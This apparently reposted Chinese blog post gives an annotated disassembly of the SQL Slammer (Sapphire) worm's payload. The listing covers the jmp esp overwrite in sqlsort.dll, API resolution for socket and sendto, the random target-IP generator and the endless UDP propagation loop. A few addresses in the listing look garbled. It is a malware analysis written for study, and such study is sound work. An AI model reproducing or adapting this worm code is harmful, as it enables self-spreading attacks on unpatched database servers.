SQL worm sapphire 關鍵程式碼分析 (轉)

worldblog發表於2007-12-13
SQLWormAPP
SQL worm sapphire 關鍵程式碼分析 (轉)[@more@]

突然間對它 wosapphire的程式碼非常感興趣,針對網上給出的test code(自己抓包也行),



一直讀到臨晨4點,終於把關鍵程式碼都註釋起來了,第一次自己剖析,感覺


挺好的,這個病毒太精湛了。如有錯誤之處,請大家斧正。
  
  yangrunhua 2/9/03 04:30am
注意:具體地址在不同版本機器上有差異


0012FCED  push 42b0c9dch ;在sqlsort.dll載入後42B0C9DC處為FFE4即jmp esp,作為返回地址
0012FCF2 B801010101  mov  eax,1010101h
0012FCF7 31C9  xor  ecx,ecx
0012FCF9 B118  mov  cl,18h
0012FCFB 50  push eax
0012FCFC E2FD  l 0012FCFB  ;迴圈填充01010101h
0012FCFE 3501010105  xor  eax,5010101h ;eax=04000000h
0012FD03 50  push eax ;從頭到此用於再生需的緩衝區  ebp+04h
;
;  x04x01x01.......x01x01xDCxC9xB0x42
0012FD04 89E5  mov  ebp,esp  ;save esp to ebp
0012FD06 51  push ecx  
0012FD07 682E646C6C  push 6C6C642Eh
0012FD0C 68656C3332  push 32336C65h
0012FD11 686B65726E  push 6E72656Bh  ;.string "kernel32.dll"  ebp-10h
0012FD16 51  push ecx
0012FD17 686F756E74  push 746E756Fh
0012FD1C 6869636B43  push 436B6369h
0012FD21 6847657454  push 54746547h  ;.string "GetTickCount"  ebp-20h
0012FD26 66B96C6C  mov  cx,6C6Ch  
0012FD2A 51  push ecx  
0012FD2B 6833322E64  push 642E3233h
0012FD30 687773325F  push 5F327377h  ;.string "ws2_32.dll"  ebp-2ch
0012FD35 66B96574  mov  cx,7465h
0012FD39 51  push ecx
0012FD3A 68736F636B  push 6B636F73h  ;.string "socket"  ebp-34h
0012FD3F 66B9746F  mov  cx,6F74h
0012FD43 51  push ecx
0012FD44 6873656E64  push 646E6573h  ;.string "sendto"  ebp-3ch
0012FD49 BE1810AE42  mov  esi,42AE1018h;address of GetDllHandle
0012FD4E 8D45D4  lea  eax,[ebp-2Ch]
0012FD51 50  push eax  ;address of "ws2_32.dll"  ebp-40h
0012FD52 FF16  call d ptr [esi]; call GetDllHandle
0012FD54 50  push eax  ; HINSTANCE of ws2_32.dll  ebp-40h
0012FD55 8D45E0  lea  eax,[ebp-20h]
0012FD58 50  push eax  ;address of "GetTickCount" ebp-44h
0012FD59 8D45F0  lea  eax,[ebp-10h]
0012FD5C 50  push eax  ;address of "kernel32.dll" ebp-48h
0012FD5D FF16  call dword ptr [esi]; call GetDllHandle
0012FD5F 50  push eax  ;address of kernel32.dll  ebp-48h
0012FD60 BE1010AE42  mov  esi,42AE1010h
0012FD65 8B1E  mov  ebx,dword ptr [esi]
0012FD67 8B03  mov  eax,dword ptr [ebx]
0012FD69 3D558BEC51  cmp  eax,51EC8B55h
0012FD6E 7405  je  0012FD75
0012FD70 BE1C10AE42  mov  esi,42AE101Ch
0012FD75 FF16  call dword ptr [esi]; call GetProcAddress for address of GetTickCount
0012FD77 FFD0  call eax  ; call GetTickCount
0012FD79 31C9  xor  ecx,ecx
0012FD7B 51  push ecx  
0012FD7C 51  push ecx  ; must be 0 of last 8 bytes of sockaddr_in struct ebp-48h
0012FD7D 50  push eax  ; Ran Value (for dest IP) ebp-4ch
0012FD7E 81F10301049A xor ecx,9A040103h
0012FD84 81F101010101 xor ecx,1010101h
0012FD8A 51  push ecx  ;ecx=0x9b050002 AF_ 0x0002 + port 1435 htons(1435)=0x9b05 ebp-50h
0012FD8B 8D45CC  lea  eax,[ebp-34h]
0012FD8E 50  push eax  ;address of "socket"  ebp-54h
0012FD8F 8B45C0  mov  eax,dword ptr [ebp-40h]
0012FD92 50  push eax  ;address of ws2_32.dll  ebp-58h
0012FD93 FF16  call dword ptr [esi]; call GetProcAddress for address of socket
0012FD95 6A11  push 11h  ; UDP protocol  ebp-54h
0012FD97 6A02  push 2  ; SOCK_DGRAM  ebp-58h
0012FD99 6A02  push 2  ; AF_INET  ebp-5ch
0012FD9B FFD0  call eax  ; call socket
0012FD9D 50  push eax  ; socket descriptor for communication  ebp-54h
0012FD9E 8D45C4  lea  eax,[ebp-3Ch]
0012FDA1 50  push eax  ;address of "sendto"
0012FDA2 8B45C0  mov  eax,dword ptr [ebp-40h]
0012FDA5 50  push eax  ;address of ws2_32.dll
0012FDA6 FF16  call dword ptr [esi]; call GetProcAddress for address of sendto
0012FDA8 89C6  mov  esi,eax  ; esi has address of sendto  
0012FDAA 09  or  ebx,ebx
0012FDAC 81F33C61D9FF xor ebx,0FFD9613Ch
0012F 8B45B4  mov  eax,dword ptr [ebp-4Ch]; fill eax with last Random Value (dest IP)
0012FDB5 8D0C40  lea  ecx,[eax+eax*2]
0012FDB8 8D1488  lea  edx,[eax+ecx*4]
0012FDBB C1E204  shl  edx,4
0012FDBE 01C2  add  edx,eax
0012FDC0 C1E208  shl  edx,8
0012FDC3 29C2  sub  edx,eax
0012FDC5 8D0490  lea  eax,[eax+edx*4]
0012FDC8 01D8  add  eax,ebx
0012FDCA 8945B4  mov  dword ptr [ebp-4Ch],eax; modify next Random Value (dest IP)
0012FDCD 6A10  push 10h  ; addr length = 16 bytes
0012FDCF 8D45B0  lea  eax,[ebp-50h]
0012FDD2 50  push eax  ; address of sockaddr_in struct
0012FDD3 31C9  xor  ecx,ecx
0012FDD5 51  push ecx  ; flags = 0
0012FDD6 6681F17801  xor  cx,178h  ; len = 376 bytes
0012FDDB 51  push ecx
0012FDDC 8D4503  lea  eax,[ebp+3]
0012FDDF 50  push eax  ; beginning of msg (we just generated), msg begins with 0x04
0012FDE0 8B45AC  mov  eax,dword ptr [ebp-54h]
0012FDE3 50  push eax  ; socket descriptor for communication
0012FDE4 FFD6  call esi  ; call sendto
0012FDE6 EBCA  jmp  0012FDB2 ; infinite loop








來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-992464/,如需轉載,請註明出處,否則將追究法律責任。







相關文章